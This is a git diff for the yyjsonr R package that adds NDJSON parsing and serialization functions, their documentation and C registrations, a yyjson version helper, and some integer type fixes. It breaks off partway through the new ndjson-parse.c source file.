diff --git a/DESCRIPTION b/DESCRIPTION index 8afe710..2422866 100644 --- a/DESCRIPTION +++ b/DESCRIPTION @@ -1,7 +1,7 @@ Package: yyjsonr Type: Package Title: Fast JSON Parser and Generator -Version: 0.1.18.9002 +Version: 0.1.18.9004 Authors@R: c( person("Mike", "Cheng", role = c("aut", "cre", 'cph'), email = "mikefc@coolbutuseless.com"), diff --git a/NAMESPACE b/NAMESPACE index 4868e67..4ec2d9c 100644 --- a/NAMESPACE +++ b/NAMESPACE @@ -6,10 +6,14 @@ export(read_json_conn) export(read_json_file) export(read_json_raw) export(read_json_str) +export(read_ndjson_file) export(validate_json_file) export(validate_json_str) export(write_json_file) export(write_json_str) +export(write_ndjson_file) +export(write_ndjson_str) export(yyjson_read_flag) +export(yyjson_version) export(yyjson_write_flag) useDynLib(yyjsonr, .registration=TRUE) diff --git a/NEWS.md b/NEWS.md index cedc185..7b01bf1 100644 --- a/NEWS.md +++ b/NEWS.md @@ -1,5 +1,9 @@ +# yyjsonr 0.1.18.9004 2024-03-15 + +* Re-introduce NDJSON support + # yyjsonr 0.1.18.9003 2024-03-13 * call `normalizePath()` on all file paths diff --git a/R/ndjson.R b/R/ndjson.R new file mode 100644 index 0000000..81e2aba --- /dev/null +++ b/R/ndjson.R @@ -0,0 +1,143 @@ + + +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +#' Parse an NDJSON file to a data.frame or list +#' +#' If reading as data.frame, each row of NDJSON becomes a row in the data.frame. +#' If reading as a list, then each row becomes an element in the list. +#' +#' If parsing NDJSON to a data.frame it is usually better if the json objects +#' are consistent from line-to-line. Type inference for the data.frame is done +#' during initialisation by reading through \code{nprobe} lines. Warning: if +#' there is a type-mismatch further into the file than it is probed, then you +#' will get missing values in the data.frame, or JSON values not captured in +#' the R data. +#' +#' No flattening of the namespace is done i.e. nested object remain nested. +#' +#' @inheritParams read_json_str +#' @param filename Path to file containing NDJSON data. May e a vanilla text +#' file or a gzipped file +#' @param type The type of R object the JSON should be parsed into. Valid +#' values are 'df' or 'list'. Default: 'df' (data.frame) +#' @param nread Number of records to read. Default: -1 (reads all JSON strings) +#' @param nskip Number of records to skip before starting to read. Default: 0 +#' (skip no data) +#' @param nprobe Number of lines to read to determine types for data.frame +#' columns. Default: 100. Use \code{-1} to probe entire file. +#' +#' +#' @examples +#' tmp <- tempfile() +#' write_ndjson_file(head(mtcars), tmp) +#' read_ndjson_file(tmp) +#' +#' @family JSON Parsers +#' @return NDJSON data read into R as list or data.frame depending +#' on \code{'type'} argument +#' @export +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +read_ndjson_file <- function(filename, type = c('df', 'list'), nread = -1, nskip = 0, nprobe = 100, opts = list(), ...) { + + type <- match.arg(type) + filename <- normalizePath(filename, mustWork = TRUE) + + if (type == 'list') { + .Call( + parse_ndjson_file_as_list_, + filename, + nread, + nskip, + modify_list(opts, list(...)) + ) + } else { + .Call( + parse_ndjson_file_as_df_, + filename, + nread, + nskip, + nprobe, + modify_list(opts, list(...)) + ) + } +} + + +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +#' Write list or data.frame object to NDJSON in a file +#' +#' For \code{list} input, each element of the list is written as a single JSON string. +#' For \code{data.frame} input, each row of the \code{data.frame} is written +#' as aJSON string. +#' +#' @inherit write_json_file +#' @param x \code{data.frame} or \code{list} to be written as multiple JSON strings +#' @param filename JSON strings will be written to this file one-line-per-JSON string. +#' +#' @return None +#' @family JSON Serializer +#' @export +#' +#' @examples +#' tmp <- tempfile() +#' write_ndjson_file(head(mtcars), tmp) +#' read_ndjson_file(tmp) +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +write_ndjson_file <- function(x, filename, opts = list(), ...) { + opts <- modify_list(opts, list(...)) + filename <- normalizePath(filename, mustWork = FALSE) + + if (is.data.frame(x)) { + .Call( + serialize_df_to_ndjson_file_, + x, + filename, + opts + ) + } else { + .Call( + serialize_list_to_ndjson_file_, + x, + filename, + opts + ) + } + invisible() +} + + +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +#' Write list or data.frame object to NDJSON in a string +#' +#' For \code{list} input, each element of the list is written as a single JSON string. +#' For \code{data.frame} input, each row of the \code{data.frame} is written +#' as aJSON string. +#' +#' @inherit write_ndjson_file +#' +#' @return String containing multiple JSON strings separated by newlines. +#' @family JSON Serializer +#' @export +#' +#' @examples +#' write_ndjson_str(head(mtcars)) +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +write_ndjson_str <- function(x, opts = list(), ...) { + opts <- modify_list(opts, list(...)) + + if (is.data.frame(x)) { + .Call( + serialize_df_to_ndjson_str_, + x, + opts + ) + } else { + .Call( + serialize_list_to_ndjson_str_, + x, + opts + ) + } +} + + diff --git a/R/utils.R b/R/utils.R index a2aeb46..239d0bd 100644 --- a/R/utils.R +++ b/R/utils.R @@ -9,4 +9,16 @@ modify_list <- function(old, new) { for (nm in names(new)) old[[nm]] <- new[[nm]] old -} \ No newline at end of file +} + + +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +#' Version number of 'yyjson' C library +#' +#' @export +#' @examples +#' yyjson_version() +#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +yyjson_version <- function() { + .Call(yyjson_version_) +} diff --git a/man/read_json_conn.Rd b/man/read_json_conn.Rd index 0eecae4..10a56b8 100644 --- a/man/read_json_conn.Rd +++ b/man/read_json_conn.Rd @@ -36,6 +36,7 @@ if (interactive()) { Other JSON Parsers: \code{\link{read_json_file}()}, \code{\link{read_json_raw}()}, -\code{\link{read_json_str}()} +\code{\link{read_json_str}()}, +\code{\link{read_ndjson_file}()} } \concept{JSON Parsers} diff --git a/man/read_json_file.Rd b/man/read_json_file.Rd index 112e59d..aac53cf 100644 --- a/man/read_json_file.Rd +++ b/man/read_json_file.Rd @@ -29,6 +29,7 @@ read_json_file(tmp) Other JSON Parsers: \code{\link{read_json_conn}()}, \code{\link{read_json_raw}()}, -\code{\link{read_json_str}()} +\code{\link{read_json_str}()}, +\code{\link{read_ndjson_file}()} } \concept{JSON Parsers} diff --git a/man/read_json_raw.Rd b/man/read_json_raw.Rd index 68629b2..55a7f63 100644 --- a/man/read_json_raw.Rd +++ b/man/read_json_raw.Rd @@ -28,6 +28,7 @@ read_json_raw(raw_str) Other JSON Parsers: \code{\link{read_json_conn}()}, \code{\link{read_json_file}()}, -\code{\link{read_json_str}()} +\code{\link{read_json_str}()}, +\code{\link{read_ndjson_file}()} } \concept{JSON Parsers} diff --git a/man/read_json_str.Rd b/man/read_json_str.Rd index 2607f2a..6891972 100644 --- a/man/read_json_str.Rd +++ b/man/read_json_str.Rd @@ -27,6 +27,7 @@ read_json_str("4294967297", opts = opts_read_json(int64 = 'string')) Other JSON Parsers: \code{\link{read_json_conn}()}, \code{\link{read_json_file}()}, -\code{\link{read_json_raw}()} +\code{\link{read_json_raw}()}, +\code{\link{read_ndjson_file}()} } \concept{JSON Parsers} diff --git a/man/read_ndjson_file.Rd b/man/read_ndjson_file.Rd new file mode 100644 index 0000000..49d9512 --- /dev/null +++ b/man/read_ndjson_file.Rd @@ -0,0 +1,68 @@ +% Generated by roxygen2: do not edit by hand +% Please edit documentation in R/ndjson.R +\name{read_ndjson_file} +\alias{read_ndjson_file} +\title{Parse an NDJSON file to a data.frame or list} +\usage{ +read_ndjson_file( + filename, + type = c("df", "list"), + nread = -1, + nskip = 0, + nprobe = 100, + opts = list(), + ... +) +} +\arguments{ +\item{filename}{Path to file containing NDJSON data. May e a vanilla text +file or a gzipped file} + +\item{type}{The type of R object the JSON should be parsed into. Valid +values are 'df' or 'list'. Default: 'df' (data.frame)} + +\item{nread}{Number of records to read. Default: -1 (reads all JSON strings)} + +\item{nskip}{Number of records to skip before starting to read. Default: 0 +(skip no data)} + +\item{nprobe}{Number of lines to read to determine types for data.frame +columns. Default: 100. Use \code{-1} to probe entire file.} + +\item{opts}{Named list of options for parsing. Usually created by \code{opts_read_json()}} + +\item{...}{Other named options can be used to override any options in \code{opts}. +The valid named options are identical to arguments to \code{\link[=opts_read_json]{opts_read_json()}}} +} +\value{ +NDJSON data read into R as list or data.frame depending +on \code{'type'} argument +} +\description{ +If reading as data.frame, each row of NDJSON becomes a row in the data.frame. +If reading as a list, then each row becomes an element in the list. +} +\details{ +If parsing NDJSON to a data.frame it is usually better if the json objects +are consistent from line-to-line. Type inference for the data.frame is done +during initialisation by reading through \code{nprobe} lines. Warning: if +there is a type-mismatch further into the file than it is probed, then you +will get missing values in the data.frame, or JSON values not captured in +the R data. + +No flattening of the namespace is done i.e. nested object remain nested. +} +\examples{ +tmp <- tempfile() +write_ndjson_file(head(mtcars), tmp) +read_ndjson_file(tmp) + +} +\seealso{ +Other JSON Parsers: +\code{\link{read_json_conn}()}, +\code{\link{read_json_file}()}, +\code{\link{read_json_raw}()}, +\code{\link{read_json_str}()} +} +\concept{JSON Parsers} diff --git a/man/write_json_file.Rd b/man/write_json_file.Rd index 7d7211d..5ef9800 100644 --- a/man/write_json_file.Rd +++ b/man/write_json_file.Rd @@ -29,6 +29,8 @@ read_json_file(tmp) } \seealso{ Other JSON Serializer: -\code{\link{write_json_str}()} +\code{\link{write_json_str}()}, +\code{\link{write_ndjson_file}()}, +\code{\link{write_ndjson_str}()} } \concept{JSON Serializer} diff --git a/man/write_json_str.Rd b/man/write_json_str.Rd index 5c38df8..eebff7c 100644 --- a/man/write_json_str.Rd +++ b/man/write_json_str.Rd @@ -25,6 +25,8 @@ write_json_str(head(iris, 3), pretty = TRUE) } \seealso{ Other JSON Serializer: -\code{\link{write_json_file}()} +\code{\link{write_json_file}()}, +\code{\link{write_ndjson_file}()}, +\code{\link{write_ndjson_str}()} } \concept{JSON Serializer} diff --git a/man/write_ndjson_file.Rd b/man/write_ndjson_file.Rd new file mode 100644 index 0000000..4796192 --- /dev/null +++ b/man/write_ndjson_file.Rd @@ -0,0 +1,38 @@ +% Generated by roxygen2: do not edit by hand +% Please edit documentation in R/ndjson.R +\name{write_ndjson_file} +\alias{write_ndjson_file} +\title{Write list or data.frame object to NDJSON in a file} +\usage{ +write_ndjson_file(x, filename, opts = list(), ...) +} +\arguments{ +\item{x}{\code{data.frame} or \code{list} to be written as multiple JSON strings} + +\item{filename}{JSON strings will be written to this file one-line-per-JSON string.} + +\item{opts}{Named list of serialization options. Usually created by \code{\link[=opts_write_json]{opts_write_json()}}} + +\item{...}{Other named options can be used to override any options in \code{opts}. +The valid named options are identical to arguments to \code{\link[=opts_write_json]{opts_write_json()}}} +} +\value{ +None +} +\description{ +For \code{list} input, each element of the list is written as a single JSON string. +For \code{data.frame} input, each row of the \code{data.frame} is written +as aJSON string. +} +\examples{ +tmp <- tempfile() +write_ndjson_file(head(mtcars), tmp) +read_ndjson_file(tmp) +} +\seealso{ +Other JSON Serializer: +\code{\link{write_json_file}()}, +\code{\link{write_json_str}()}, +\code{\link{write_ndjson_str}()} +} +\concept{JSON Serializer} diff --git a/man/write_ndjson_str.Rd b/man/write_ndjson_str.Rd new file mode 100644 index 0000000..057d5e1 --- /dev/null +++ b/man/write_ndjson_str.Rd @@ -0,0 +1,34 @@ +% Generated by roxygen2: do not edit by hand +% Please edit documentation in R/ndjson.R +\name{write_ndjson_str} +\alias{write_ndjson_str} +\title{Write list or data.frame object to NDJSON in a string} +\usage{ +write_ndjson_str(x, opts = list(), ...) +} +\arguments{ +\item{x}{\code{data.frame} or \code{list} to be written as multiple JSON strings} + +\item{opts}{Named list of serialization options. Usually created by \code{\link[=opts_write_json]{opts_write_json()}}} + +\item{...}{Other named options can be used to override any options in \code{opts}. +The valid named options are identical to arguments to \code{\link[=opts_write_json]{opts_write_json()}}} +} +\value{ +String containing multiple JSON strings separated by newlines. +} +\description{ +For \code{list} input, each element of the list is written as a single JSON string. +For \code{data.frame} input, each row of the \code{data.frame} is written +as aJSON string. +} +\examples{ +write_ndjson_str(head(mtcars)) +} +\seealso{ +Other JSON Serializer: +\code{\link{write_json_file}()}, +\code{\link{write_json_str}()}, +\code{\link{write_ndjson_file}()} +} +\concept{JSON Serializer} diff --git a/man/yyjson_version.Rd b/man/yyjson_version.Rd new file mode 100644 index 0000000..767617c --- /dev/null +++ b/man/yyjson_version.Rd @@ -0,0 +1,14 @@ +% Generated by roxygen2: do not edit by hand +% Please edit documentation in R/utils.R +\name{yyjson_version} +\alias{yyjson_version} +\title{Version number of 'yyjson' C library} +\usage{ +yyjson_version() +} +\description{ +Version number of 'yyjson' C library +} +\examples{ +yyjson_version() +} diff --git a/src/Makevars b/src/Makevars index 57d168e..10fb6a8 100644 --- a/src/Makevars +++ b/src/Makevars @@ -1 +1,2 @@ PKG_LIBS=-lz +#PKG_CFLAGS += -Wconversion \ No newline at end of file diff --git a/src/R-yyjson-parse.c b/src/R-yyjson-parse.c index 15e5e7c..1edb384 100644 --- a/src/R-yyjson-parse.c +++ b/src/R-yyjson-parse.c @@ -1971,7 +1971,7 @@ SEXP parse_from_gzfile_(SEXP filename_, SEXP parse_opts_) { // Allocate a buffer to hold the uncompressed file. // Note: this approach will change if/when yyjson implements streaming //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - char *buf = (char *)malloc(uncompressed_len + 1); + char *buf = (char *)malloc((unsigned long)uncompressed_len + 1); if (buf == 0) { error("Couldn't allocate buffer for reading json.gz file: %s", filename); } @@ -1980,7 +1980,7 @@ SEXP parse_from_gzfile_(SEXP filename_, SEXP parse_opts_) { // Uncompress file to buffer //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ gzFile gzfp = gzopen(filename, "r"); - int N = gzread(gzfp, (void *)buf, uncompressed_len); + int N = gzread(gzfp, (void *)buf, (unsigned int)uncompressed_len); gzclose(gzfp); if (N != uncompressed_len) { error("Incorrect number of bytes read. Expected %i, read %i", uncompressed_len, N); diff --git a/src/R-yyjson-serialize.c b/src/R-yyjson-serialize.c index fbdc831..e9fca3e 100644 --- a/src/R-yyjson-serialize.c +++ b/src/R-yyjson-serialize.c @@ -153,7 +153,7 @@ yyjson_mut_val *scalar_integer_to_json_val(int32_t rint, yyjson_mut_doc *doc, se //=========================================================================== // Scalar bit64::integer64 (stored in REALSXP) to JSON value //=========================================================================== -yyjson_mut_val *scalar_integer64_to_json_val(SEXP vec_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt) { +yyjson_mut_val *scalar_integer64_to_json_val(SEXP vec_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt) { yyjson_mut_val *val; @@ -175,7 +175,7 @@ yyjson_mut_val *scalar_integer64_to_json_val(SEXP vec_, unsigned int idx, yyjson //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ // //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -yyjson_mut_val *scalar_date_to_json_val(SEXP vec_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt) { +yyjson_mut_val *scalar_date_to_json_val(SEXP vec_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt) { char buf[50]; double ndays = 0; @@ -207,7 +207,7 @@ yyjson_mut_val *scalar_date_to_json_val(SEXP vec_, unsigned int idx, yyjson_mut_ //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ // //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -yyjson_mut_val *scalar_posixct_to_json_val(SEXP vec_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt) { +yyjson_mut_val *scalar_posixct_to_json_val(SEXP vec_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt) { char buf[50]; double seconds = 0; @@ -240,7 +240,7 @@ yyjson_mut_val *scalar_posixct_to_json_val(SEXP vec_, unsigned int idx, yyjson_m //=========================================================================== // Scalar RAWSXP to JSON value //=========================================================================== -yyjson_mut_val *scalar_rawsxp_to_json_val(SEXP vec_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt) { +yyjson_mut_val *scalar_rawsxp_to_json_val(SEXP vec_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt) { yyjson_mut_val *val; @@ -254,7 +254,7 @@ yyjson_mut_val *scalar_rawsxp_to_json_val(SEXP vec_, unsigned int idx, yyjson_mu //=========================================================================== // Scalar Factor to JSON value //=========================================================================== -yyjson_mut_val *scalar_factor_to_json_val(SEXP factor_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt) { +yyjson_mut_val *scalar_factor_to_json_val(SEXP factor_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt) { yyjson_mut_val *val ; int32_t factor = INTEGER(factor_)[idx]; @@ -327,7 +327,7 @@ yyjson_mut_val *scalar_double_to_json_val(double rdbl, yyjson_mut_doc *doc, seri //=========================================================================== // Scalar STRSRXP to JSON value //=========================================================================== -yyjson_mut_val *scalar_strsxp_to_json_val(SEXP str_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt) { +yyjson_mut_val *scalar_strsxp_to_json_val(SEXP str_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt) { yyjson_mut_val *val; diff --git a/src/R-yyjson-serialize.h b/src/R-yyjson-serialize.h index 7c6beef..3e27536 100644 --- a/src/R-yyjson-serialize.h +++ b/src/R-yyjson-serialize.h @@ -85,13 +85,13 @@ serialize_options parse_serialize_options(SEXP serialize_opts_); yyjson_mut_val *serialize_core(SEXP robj_, yyjson_mut_doc *doc, serialize_options *opt); yyjson_mut_val *scalar_logical_to_json_val(int32_t rlgl, yyjson_mut_doc *doc, serialize_options *opt); yyjson_mut_val *scalar_integer_to_json_val(int32_t rint, yyjson_mut_doc *doc, serialize_options *opt); -yyjson_mut_val *scalar_integer64_to_json_val(SEXP vec_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt); -yyjson_mut_val *scalar_date_to_json_val(SEXP vec_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt); -yyjson_mut_val *scalar_posixct_to_json_val(SEXP vec_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt); -yyjson_mut_val *scalar_rawsxp_to_json_val(SEXP vec_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt); -yyjson_mut_val *scalar_factor_to_json_val(SEXP factor_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt); +yyjson_mut_val *scalar_integer64_to_json_val(SEXP vec_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt); +yyjson_mut_val *scalar_date_to_json_val(SEXP vec_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt); +yyjson_mut_val *scalar_posixct_to_json_val(SEXP vec_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt); +yyjson_mut_val *scalar_rawsxp_to_json_val(SEXP vec_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt); +yyjson_mut_val *scalar_factor_to_json_val(SEXP factor_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt); yyjson_mut_val *scalar_double_to_json_val(double rdbl, yyjson_mut_doc *doc, serialize_options *opt); -yyjson_mut_val *scalar_strsxp_to_json_val(SEXP str_, unsigned int idx, yyjson_mut_doc *doc, serialize_options *opt); +yyjson_mut_val *scalar_strsxp_to_json_val(SEXP str_, R_xlen_t idx, yyjson_mut_doc *doc, serialize_options *opt); yyjson_mut_val *data_frame_row_to_json_object(SEXP df_, unsigned int *col_type, unsigned int row, int skip_col, yyjson_mut_doc *doc, serialize_options *opt); unsigned int *detect_data_frame_types(SEXP df_, serialize_options *opt); diff --git a/src/init.c b/src/init.c index 68d9710..94810cf 100644 --- a/src/init.c +++ b/src/init.c @@ -3,6 +3,13 @@ #include #include + +SEXP yyjson_version_(void); + + +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +// Regular JSON +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ extern SEXP parse_from_str_ (SEXP str_ , SEXP parse_opts_); extern SEXP parse_from_file_(SEXP filename_, SEXP parse_opts_); extern SEXP parse_from_raw_ (SEXP filename_, SEXP parse_opts_); @@ -13,7 +20,28 @@ extern SEXP serialize_to_file_(SEXP x_, SEXP filename_, SEXP serialize_opts_); extern SEXP validate_json_file_(SEXP filename_, SEXP verbose_, SEXP parse_opts_); extern SEXP validate_json_str_ (SEXP str_ , SEXP verbose_, SEXP parse_opts_); +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +// NDJSON +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +extern SEXP parse_ndjson_file_as_df_ (SEXP filename_, SEXP nread_, SEXP nskip_, SEXP nprobe_, SEXP parse_opts_); +extern SEXP parse_ndjson_file_as_list_(SEXP filename_, SEXP nread_, SEXP nskip_, SEXP parse_opts_); + +extern SEXP serialize_df_to_ndjson_str_ (SEXP robj_, SEXP serialize_opts_); +extern SEXP serialize_df_to_ndjson_file_(SEXP robj_, SEXP filename_, SEXP serialize_opts_); + +extern SEXP serialize_list_to_ndjson_str_ (SEXP robj_, SEXP serialize_opts_); +extern SEXP serialize_list_to_ndjson_file_(SEXP robj_, SEXP filename_, SEXP serialize_opts_); + + + + static const R_CallMethodDef CEntries[] = { + + {"yyjson_version_", (DL_FUNC) &yyjson_version_, 0}, + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Regular JSON + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ {"serialize_to_str_" , (DL_FUNC) &serialize_to_str_ , 2}, {"serialize_to_file_", (DL_FUNC) &serialize_to_file_, 3}, @@ -24,6 +52,19 @@ static const R_CallMethodDef CEntries[] = { {"validate_json_file_", (DL_FUNC) &validate_json_file_, 3}, {"validate_json_str_" , (DL_FUNC) &validate_json_str_ , 3}, + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // NDJSON + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + {"parse_ndjson_file_as_df_" , (DL_FUNC) &parse_ndjson_file_as_df_ , 5}, + {"parse_ndjson_file_as_list_", (DL_FUNC) &parse_ndjson_file_as_list_, 4}, + + {"serialize_df_to_ndjson_str_" , (DL_FUNC) &serialize_df_to_ndjson_str_ , 2}, + {"serialize_df_to_ndjson_file_", (DL_FUNC) &serialize_df_to_ndjson_file_, 3}, + + {"serialize_list_to_ndjson_str_" , (DL_FUNC) &serialize_list_to_ndjson_str_ , 2}, + {"serialize_list_to_ndjson_file_", (DL_FUNC) &serialize_list_to_ndjson_file_, 3}, + + {NULL , NULL, 0} }; diff --git a/src/ndjson-parse.c b/src/ndjson-parse.c new file mode 100644 index 0000000..736a191 --- /dev/null +++ b/src/ndjson-parse.c @@ -0,0 +1,510 @@ + + +#include +#include +#include +#include + +#include +#include +#include + +#include + +#include "yyjson.h" +#include "R-yyjson-parse.h" +#include "R-yyjson-serialize.h" + +#define MAX_LINE_LENGTH 131072 +#define INIT_LIST_LENGTH 64 + + +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +// Double the length of a list by +// - allocating space for a list which is twice the length +// - copy across all elements one-by-one +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEXP grow_list(SEXP oldlist) { + R_xlen_t len = XLENGTH(oldlist); + SEXP newlist = PROTECT(allocVector(VECSXP, 2 * len)); + for (R_len_t i=0; i < len; i++) { + SET_VECTOR_ELT(newlist, i, VECTOR_ELT(oldlist, i)); + } + UNPROTECT(1); + return newlist; +} + + +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +// Count the number of newlines in a file +// 'gz' lib handles compressed and uncompressed files. +// +// Two options for parsing streaming input from a file: +// (1) calculate num of lines. Allocate this exactly. Parse file. +// - PRO: Minimise re-allocation as data grows +// - CON: have to traverse the file twice +// (2) Start parsing and just double memory allocation whenever we run out +// of room in the data.frame or list. +// - PRO: Only traverse the file once +// - CON: Have to spend effort re-allocating R object as it grows +// +// For LIST objects, it's really easy to groww their size. See 'grow_list_()' +// and then just truncate it to the actual data size at the end. +// +// For data.frames, growing its size involves growing the size of every +// column individually. For int/double, this is an easy re-allocation. +// For string STRSXP you'd have to grow them in the same manner as 'grow_list_()' +// grows VECSXP objects. This seems like a lot of work in order to figure +// out if its any faster than just traversing the file twice in order to +// count number of newlines. +// +// For now (2023-08-09), ndjson->list will use method 2 and +// ndjson->data.frame will use method 1 +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +int count_lines(const char *filename) { + char buf[MAX_LINE_LENGTH]; + int counter = 0; + + gzFile file = gzopen(filename, "r"); + + for(;;) { + size_t res = gzfread(buf, 1, MAX_LINE_LENGTH, file); + + int i; + for(i = 0; i < res; i++) { + if (buf[i] == '\n') + counter++; + } + + if (gzeof(file)) + break; + } + + gzclose(file); + return counter; +} + + + +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +// Parse ndjson as a list of R objects: one-r-object-per-line-of-input +// +// Compared to parsing to data.frame +// PRO: Simple +// PRO: Can handle any type without worrying about data.frame column types +// being consistent across multiple input lines +// CON: Slower: Every object on every line gets allocated into an R object +// Compared to data.frame which allocates all its space at once and +// just slots values into this memory. +//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEXP parse_ndjson_file_as_list_(SEXP filename_, SEXP nread_, SEXP nskip_, SEXP parse_opts_) { + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Buffer to read each line of the input file. + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + char buf[MAX_LINE_LENGTH]; + + parse_options opt = create_parse_options(parse_opts_); + + int nread = asInteger(nread_); + int nskip = asInteger(nskip_); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Check for file + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + const char *filename = (const char *)CHAR(STRING_ELT(filename_, 0)); + filename = R_ExpandFileName(filename); + if (access(filename, R_OK) != 0) { + error("Cannot read from file '%s'", filename); + } + + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Open file + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + gzFile input = gzopen(filename, "r"); + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Skip lines if requested + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + if (nskip > 0) { + while (gzgets(input, buf, MAX_LINE_LENGTH) != 0) { + nskip--; + if (nskip == 0) break; + } + } + + //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + // Allocating a list with a default starting size to grow into. + 